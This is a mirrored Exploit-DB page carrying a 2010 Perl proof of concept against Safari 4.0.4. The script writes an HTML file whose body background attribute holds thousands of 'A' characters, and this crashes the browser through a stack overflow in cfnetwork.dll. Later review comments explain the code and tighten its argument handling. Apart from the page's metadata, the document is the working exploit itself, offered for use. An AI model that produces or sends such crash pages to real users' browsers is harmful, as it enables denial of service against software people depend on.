Apple Safari 4.0.4 (531.21.10) – Stack Overflow / Denial of Service

  • 作者: John Cobb
    日期: 2010-02-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11601/
  • #!/usr/bin/perl
    #
    # Safari 4.0.4 (531.21.10) - Stack Overflow/run
    # 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
    # Tested on WinXP (32bit) SP3
    #
    # Magic Numbers:
    # 114516 -> 114718 : Safari quits without error
    # 114719 : Safari quits with illegal operation:
    # AppName: safari.exe
    # AppVer: 5.31.21.10
    # ModName: cfnetwork.dll
    # ModVer: 1.450.5.0
    # Offset: 000567a7
    
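    use strict;
    use warnings;

    # Writes a small HTML test page whose <body background="..."> attribute
    # holds <buffer> repetitions of the letter "A".
    #
    # Arguments:
    #   <filename.html>  path of the file to create (truncated if it exists)
    #   <buffer>         non-negative integer: number of "A" characters
    #
    # NOTE(review): the "Magic Numbers" in the header are presumably values of
    # <buffer> at which the author saw Safari exit on WinXP SP3; the header
    # records only a crash location (cfnetwork.dll, offset 000567a7) and the
    # page gives no further root-cause analysis.
    my ($filename, $buffer) = @ARGV;

    # The original printed the usage text and then carried on with undefined
    # arguments; stop here instead, and reject a non-numeric length.
    if (   !defined($filename)
        || !defined($buffer)
        || $buffer !~ /\A\d+\z/)
    {
        print "Usage: $0 <filename.html> <buffer>\n\n";
        exit 1;
    }

    # This literal spans two source lines, so the line break and the leading
    # whitespace before <head> are part of the generated file.
    my $header = "<html>
    <head>" . "\n";
    # The oversized attribute value is the only variable part of the page.
    my $crash  = "<body background = \"" . ("A" x $buffer) . "\">" . "\n";
    # <head> and <body> are never closed; kept as in the original output.
    my $footer = "</html>" . "\n";

    my $data = $header . $crash . $footer;

    # Three-argument open with a lexical handle: characters in the filename
    # can no longer alter the open mode, and every I/O step is checked so a
    # failed write is reported instead of silently producing no file.
    open(my $out, '>', $filename)
        or die "Cannot open '$filename' for writing: $!\n";
    print {$out} $data
        or die "Cannot write to '$filename': $!\n";
    close($out)
        or die "Cannot close '$filename': $!\n";

    exit 0;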